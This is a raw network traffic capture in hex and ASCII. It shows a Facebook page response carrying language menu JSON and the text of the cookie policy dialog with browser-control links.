                                                                                    Data Ascii: 1d28eywsn9W9fpiBDRDUunbxKnOD9nUJuj0dfrJ3zzIuA","untrusted_link_default_hash":"AT0mvRiy94ISxptL19EsR9DiwamIlsYv6kFDxO9e6Ia6me-BqQNsCNu-fw9leQDzGgEK_c_vcdYg9eFQv0wkJByxZKLyBj1v8MYJpkspHAlCPj5EN6hhhYtza-kWbxi8dGodPAMfLjGup1fSP8L5aA","linkshim_host":"l.face
                                                                                    2023-02-07 18:46:13 UTC1178INData Raw: 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6c 5f 51 62 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6d 5f 37 49 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6e 5f 63 4d 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6f 5f 6c 66 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 70 5f 67 67 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 71 5f 62 61 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 72 5f 79 44 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 73 5f 71 79 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 74 5f 6d 57 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33
                                                                                    Data Ascii: "__markup_3310c079_0_l_Qb","__markup_3310c079_0_m_7I","__markup_3310c079_0_n_cM","__markup_3310c079_0_o_lf","__markup_3310c079_0_p_gg","__markup_3310c079_0_q_ba","__markup_3310c079_0_r_yD","__markup_3310c079_0_s_qy","__markup_3310c079_0_t_mW","__markup_33
                                                                                    2023-02-07 18:46:13 UTC1180INData Raw: 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 65 73 5f 45 53 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 36 5f 76 39 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 45 73 70 61 5c 75 30 30 66 31 6f 6c 20 28 45 73 70 61 5c 75 30 30 66 31 61 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 66 72 5f 46 52 22 2c 22 73 65 6c 65
                                                                                    Data Ascii: "},{"class":"headerItem","value":"es_ES","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_6_v9"},"label":"Espa\u00f1ol (Espa\u00f1a)","title":"","className":"headerItem"},{"class":"headerItem","value":"fr_FR","sele
                                                                                    2023-02-07 18:46:13 UTC1181INData Raw: 31 30 63 30 37 39 5f 30 5f 64 5f 6f 6d 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 50 6f 72 74 75 67 75 5c 75 30 30 65 61 73 20 28 42 72 61 73 69 6c 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 70 74 5f 50 54 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 65 5f 44 58 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 50 6f 72 74 75 67 75 5c 75 30 30 65 61 73 20 28 50 6f 72 74 75 67 61 6c
                                                                                    Data Ascii: 10c079_0_d_om"},"label":"Portugu\u00eas (Brasil)","title":"","className":"headerItem"},{"class":"headerItem","value":"pt_PT","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_e_DX"},"label":"Portugu\u00eas (Portugal
                                                                                    2023-02-07 18:46:13 UTC1183INData Raw: 75 65 22 3a 22 65 6c 5f 47 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6c 5f 51 62 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 33 39 35 5c 75 30 33 62 62 5c 75 30 33 62 62 5c 75 30 33 62 37 5c 75 30 33 62 64 5c 75 30 33 62 39 5c 75 30 33 62 61 5c 75 30 33 61 63 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 72 75 5f 52 55 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66
                                                                                    Data Ascii: ue":"el_GR","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_l_Qb"},"label":"\u0395\u03bb\u03bb\u03b7\u03bd\u03b9\u03ba\u03ac","title":"","className":"headerItem"},{"class":"headerItem","value":"ru_RU","selected":f
                                                                                    2023-02-07 18:46:13 UTC1184INData Raw: 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 7a 68 5f 43 4e 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 73 5f 71 79 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 37 62 38 30 5c 75 34 66 35 33 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49
                                                                                    Data Ascii: "","className":"headerItem"},{"class":"headerItem","value":"zh_CN","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_s_qy"},"label":"\u4e2d\u6587(\u7b80\u4f53)","title":"","className":"headerItem"},{"class":"headerI
                                                                                    2023-02-07 18:46:13 UTC1186INData Raw: 65 73 22 3a 7b 22 64 61 74 61 2d 74 65 73 74 69 64 22 3a 22 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 2d 6d 61 6e 61 67 65 2d 64 69 61 6c 6f 67 22 7d 2c 22 63 6c 61 73 73 4e 61 6d 65 73 22 3a 5b 22 5f 39 6f 2d 77 22 5d 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 5a 79 22 7d 5d 2c 32 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 65 35 61 64 32 34 33 64 5f 30 5f 30 5f 4f 76 22 2c 5b 22 50 6f 70 6f 76 65 72 4d 65 6e 75 22 2c 22 5f 5f 69 6e 73 74 5f 31 64 65 31 34 36 64 63 5f 30 5f 30 5f 47 76 22 2c 22 5f 5f 65 6c 65 6d 5f 65 63 37 37 61 66 62 64 5f 30 5f 30 5f 68 74 22 2c 22 5f 5f 69 6e 73 74 5f 30 32 31 38 32 30 31 35 5f 30 5f 30 5f 54 56 22 2c 22 50 6f 70 6f 76 65 72 4d 65 6e 75 43 6f 6e 74 65 78 74 4d 69 6e 57 69 64 74
                                                                                    Data Ascii: es":{"data-testid":"cookie-policy-manage-dialog"},"classNames":["_9o-w"]},{"__m":"__markup_9f5fac15_0_0_Zy"}],2],["__inst_e5ad243d_0_0_Ov",["PopoverMenu","__inst_1de146dc_0_0_Gv","__elem_ec77afbd_0_0_ht","__inst_02182015_0_0_TV","PopoverMenuContextMinWidt
                                                                                    2023-02-07 18:46:13 UTC1187INData Raw: 75 73 65 20 6f 66 20 63 6f 6f 6b 69 65 73 20 66 72 6f 6d 20 46 61 63 65 62 6f 6f 6b 20 6f 6e 20 74 68 69 73 20 62 72 6f 77 73 65 72 3f 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 67 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 31 5c 22 3e 57 65 20 75 73 65 20 63 6f 6f 6b 69 65 73 20 61 6e 64 20 73 69 6d 69 6c 61 72 20 74 65 63 68 6e 6f 6c 6f 67 69 65 73 20 74 6f 20 68 65 6c 70 3a 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 32 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22
                                                                                    Data Ascii: use of cookies from Facebook on this browser?\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9o-g\">\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9xo1\">We use cookies and similar technologies to help:\u003C\/div>\u003Cdiv class=\"_9xo2\">\u003Ci class=\"
                                                                                    2023-02-07 18:46:13 UTC1189INData Raw: 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 70 76 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 70 77 5c 22 3e 45 73 73 65 6e 74 69 61 6c 20 63 6f 6f 6b 69 65 73 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 54 68 65 73 65 20 63 6f 6f 6b 69 65 73 20 61 72 65 20 72 65 71 75 69 72 65 64 20 74 6f 20 75 73 65 20 4d 65 74 61 20 50 72 6f 64 75 63 74 73 2e 20 54 68 65 79 5c 75 32 30 31 39 72 65 20 6e 65 63 65 73 73 61 72 79 20 66 6f 72 20 74 68 65 73 65 20 73 69 74 0d 0a
                                                                                    Data Ascii: 003C\/div>\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9xpv\">\u003Cdiv>\u003Cdiv class=\"_9xpw\">Essential cookies\u003C\/div>\u003Cdiv>These cookies are required to use Meta Products. They\u2019re necessary for these sit
                                                                                    2023-02-07 18:46:13 UTC1189INData Raw: 32 62 63 64 0d 0a 65 73 20 74 6f 20 77 6f 72 6b 20 61 73 20 69 6e 74 65 6e 64 65 64 2e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 30 5c 22 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6b 5c 22 3e 4f 70 74 69 6f 6e 61 6c 20 63 6f 6f 6b 69 65 73 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 3e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 70 2d 5c 22 3e 43 6f 6f 6b 69 65 73 20 66 72 6f 6d 20 6f 74 68
                                                                                    Data Ascii: 2bcdes to work as intended.\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cp class=\"_9o-k\">Optional cookies\u003C\/p>\u003Cp>\u003C\/p>\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9xp-\">Cookies from oth
                                                                                    2023-02-07 18:46:13 UTC1190INData Raw: 5f 39 78 71 30 5c 22 3e 4f 74 68 65 72 20 63 6f 6d 70 61 6e 69 65 73 20 77 69 6c 6c 20 72 65 63 65 69 76 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 79 6f 75 20 62 79 20 75 73 69 6e 67 20 63 6f 6f 6b 69 65 73 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 5c 2f 75 6c 3e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 70 61 6d 20 5f 39 6f 2d 6e 20 75 69 42 6f 78 47 72 61 79 5c 22 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6f 5c 22 3e 49 66 20 79 6f 75 20 64 6f 6e 5c 75 32 30 31 39 74 20 61 6c 6c 6f 77 20 74 68 65 73 65 20 63 6f 6f 6b 69 65 73 3a 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43
                                                                                    Data Ascii: _9xq0\">Other companies will receive information about you by using cookies\u003C\/li>\u003C\/ul>\u003C\/p>\u003C\/div>\u003C\/p>\u003Cp>\u003Cdiv class=\"pam _9o-n uiBoxGray\">\u003Cp class=\"_9o-o\">If you don\u2019t allow these cookies:\u003C\/p>\u003C
                                                                                    2023-02-07 18:46:13 UTC1192INData Raw: 65 20 75 73 20 61 62 6f 75 74 20 79 6f 75 72 20 61 63 74 69 76 69 74 79 20 6f 66 66 20 4d 65 74 61 20 43 6f 6d 70 61 6e 79 20 50 72 6f 64 75 63 74 73 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 73 69 74 65 73 20 61 6e 64 20 61 70 70 73 2e 20 59 6f 75 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 77 68 65 74 68 65 72 20 77 65 20 75 73 65 20 74 68 69 73 20 64 61 74 61 20 74 6f 20 73 68 6f 77 20 79 6f 75 20 61 64 73 20 69 6e 20 79 6f 75 72 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 73 65 74 74 69 6e 67 73 5c 2f 61 64 73 5c 2f 5c 22 3e 61 64 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 61 3e 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22
                                                                                    Data Ascii: e us about your activity off Meta Company Products, including websites and apps. You can control whether we use this data to show you ads in your \u003Ca href=\"https:\/\/www.facebook.com\/settings\/ads\/\">ad settings\u003C\/a>.\u003C\/p>\u003Cp class=\"
                                                                                    2023-02-07 18:46:13 UTC1193INData Raw: 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 68 65 6c 70 5c 2f 32 32 30 37 32 35 36 36 39 36 31 38 32 36 32 37 5c 22 3e 6f 66 66 2d 46 61 63 65 62 6f 6f 6b 20 61 63 74 69 76 69 74 79 5c 75 30 30 33 43 5c 2f 61 3e 2c 20 68 6f 77 20 77 65 20 75 73 65 20 69 74 2c 20 61 6e 64 20 68 6f 77 20 79 6f 75 20 63 61 6e 20 6d 61 6e 61 67 65 20 69 74 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22
                                                                                    Data Ascii: rn more about \u003Ca href=\"https:\/\/www.facebook.com\/help\/2207256696182627\">off-Facebook activity\u003C\/a>, how we use it, and how you can manage it.\u003C\/p>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cdiv class=\"_9vtg\" id=\"
                                                                                    2023-02-07 18:46:13 UTC1195INData Raw: 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 20 6f 66 20 43 61 6e 61 64 61 5c 75 30 30 33 43 5c 2f 61 3e 20 69 6e 20 43 61 6e 61 64 61 20 6f 72 20 74 68 65 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 79 6f 75 72 6f 6e 6c 69 6e 65 63 68 6f 69 63 65 73 2e 63 6f 6d 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 31 78 67 5a 59 75 7a 61 64 6c 75 30 45 63 61 54 74 51 73 52 57 49 44 52 33 72 49 61 67 44 79 44 66 72 70 52 42 48 73 74 6b 79 55 55 47 63 4e 5a 5f 77 2d 39 70 31 38 39 6b 47 53 45 4e 55 33 51 36 4c 39 75 46 53 68 62 71 67 58 2d 36 39 42 38
                                                                                    Data Ascii: ertising Alliance of Canada\u003C\/a> in Canada or the \u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fwww.youronlinechoices.com\u00252F&amp;h=AT1xgZYuzadlu0EcaTtQsRWIDR3rIagDyDfrpRBHstkyUUGcNZ_w-9p189kGSENU3Q6L9uFShbqgX-69B8
                                                                                    2023-02-07 18:46:13 UTC1196INData Raw: 4e 42 6f 70 35 41 4a 6b 31 7a 53 51 63 53 36 66 72 6a 6a 52 53 5a 69 55 44 76 33 34 6f 72 41 4a 30 33 61 4d 6a 33 2d 56 77 4b 6c 73 32 4a 34 66 50 41 65 68 43 56 34 69 50 70 72 58 78 56 66 2d 71 6f 34 56 70 6e 76 47 79 39 79 6b 54 33 6c 64 32 65 30 74 64 68 63 63 35 6a 74 6c 37 49 62 4d 45 73 6b 62 53 4d 79 48 79 38 33 42 56 62 32 59 57 63 4d 53 30 61 6a 30 73 6a 6e 33 53 36 49 79 41 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 20 6f 66 20 43 61 6e 61 64 61 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e
                                                                                    Data Ascii: NBop5AJk1zSQcS6frjjRSZiUDv34orAJ03aMj3-VwKls2J4fPAehCV4iPprXxVf-qo4VpnvGy9ykT3ld2e0tdhcc5jtl7IbMEskbSMyHy83BVb2YWcMS0aj0sjn3S6IyA\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"asynclazy\">Digital Advertising Alliance of Canada\u003C\/a>\u003C\/li>
                                                                                    2023-02-07 18:46:13 UTC1198INData Raw: 65 20 63 6f 6e 74 72 6f 6c 73 20 6f 66 66 65 72 65 64 20 62 79 20 70 6f 70 75 6c 61 72 20 62 72 6f 77 73 65 72 73 20 61 74 20 74 68 65 20 6c 69 6e 6b 73 20 62 65 6c 6f 77 2e 20 43 65 72 74 61 69 6e 20 70 61 72 74 73 20 6f 66 20 4d 65 74 61 20 50 72 6f 64 75 63 74 73 20 6d 61 79 20 6e 6f 74 20 77 6f 72 6b 20 70 72 6f 70 65 72 6c 79 20 69 66 20 79 6f 75 20 68 61 76 65 20 64 69 73 61 62 6c 65 64 20 62 72 6f 77 73 65 72 20 63 6f 6f 6b 69 65 73 2e 20 50 6c 65 61 73 65 20 62 65 20 61 77 61 72 65 20 74 68 61 74 20 74 68 65 73 65 20 63 6f 6e 74 72 6f 6c 73 20 61 72 65 20 64 69 73 74 69 6e 63 74 20 66 72 6f 6d 20 74 68 65 20 63 6f 6e 74 72 6f 6c 73 20 74 68 61 74 20 46 61 63 65 62 6f 6f 6b 20 6f 66 66 65 72 73 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 75
                                                                                    Data Ascii: e controls offered by popular browsers at the links below. Certain parts of Meta Products may not work properly if you have disabled browser cookies. Please be aware that these controls are distinct from the controls that Facebook offers.\u003C\/p>\u003Cu
                                                                                    2023-02-07 18:46:13 UTC1199INData Raw: 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 46 69 72 65 66 6f 78 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 73 75 70 70 6f 72 74 2e 61 70 70 6c 65 2e 63 6f 6d 5c 75 30 30 32 35 32 46 65 6e 2d 69 65 5c 75 30 30 32 35 32 46 67 75 69 64 65 5c 75 30 30 32 35 32 46 73 61 66 61 72 69 5c 75 30 30 32 35 32 46 73 66 72 69 31 31 34 37 31 5c 75 30 30 32 35 32 46 6d 61
                                                                                    Data Ascii: "_blank\" rel=\"nofollow\" data-lynx-mode=\"asynclazy\">Firefox\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fsupport.apple.com\u00252Fen-ie\u00252Fguide\u00252Fsafari\u00252Fsfri11471\u00252Fma
                                                                                    2023-02-07 18:46:13 UTC1200INData Raw: 32 61 64 62 0d 0a 31 33 79 63 63 79 36 71 52 35 61 57 42 56 39 37 4a 2d 36 47 30 74 59 33 53 75 63 69 67 52 4f 6e 5a 59 78 50 5a 32 76 78 4f 69 39 58 38 79 35 43 66 7a 41 48 77 48 49 52 50 6e 76 53 48 2d 67 76 59 53 52 4f 79 4a 4e 4d 76 2d 5a 4a 37 41 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 53 61 66 61 72 69 20 4d 6f 62 69 6c 65 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33
                                                                                    Data Ascii: 2adb13yccy6qR5aWBV97J-6G0tY3SucigROnZYxPZ2vxOi9X8y5CfzAHwHIRPnvSH-gvYSROyJNMv-ZJ7A\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"asynclazy\">Safari Mobile\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253
                                                                                    2023-02-07 18:46:13 UTC1201INData Raw: 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 32 5f 55 68 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 44 65 75 74 73 63 68 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 33 5f 47 51 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 6e 67 6c 69 73 68 20 28 55 4b 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 34 5f 6e 67 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 6e 67 6c 69 73 68 20 28 55 53 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 35 5f 31 41 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 73 70 61 5c 75 30 30 66 31 6f 6c 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 36 5f 76 39 22 2c 7b 22 5f 5f 68
                                                                                    Data Ascii: "__markup_3310c079_0_2_Uh",{"__html":"Deutsch"},1],["__markup_3310c079_0_3_GQ",{"__html":"English (UK)"},1],["__markup_3310c079_0_4_ng",{"__html":"English (US)"},1],["__markup_3310c079_0_5_1A",{"__html":"Espa\u00f1ol"},1],["__markup_3310c079_0_6_v9",{"__h
                                                                                    2023-02-07 18:46:13 UTC1203INData Raw: 6c 22 3a 22 5c 75 30 39 33 39 5c 75 30 39 33 66 5c 75 30 39 32 38 5c 75 30 39 34 64 5c 75 30 39 32 36 5c 75 30 39 34 30 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 71 5f 62 61 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 65 32 30 5c 75 30 65 33 32 5c 75 30 65 32 39 5c 75 30 65 33 32 5c 75 30 65 34 34 5c 75 30 65 31 37 5c 75 30 65 32 32 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 72 5f 79 44 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 35 33 66 30 5c 75 37 30 36 33 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 73 5f 71 79 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37
                                                                                    Data Ascii: l":"\u0939\u093f\u0928\u094d\u0926\u0940"},1],["__markup_3310c079_0_q_ba",{"__html":"\u0e20\u0e32\u0e29\u0e32\u0e44\u0e17\u0e22"},1],["__markup_3310c079_0_r_yD",{"__html":"\u4e2d\u6587(\u53f0\u7063)"},1],["__markup_3310c079_0_s_qy",{"__html":"\u4e2d\u6587
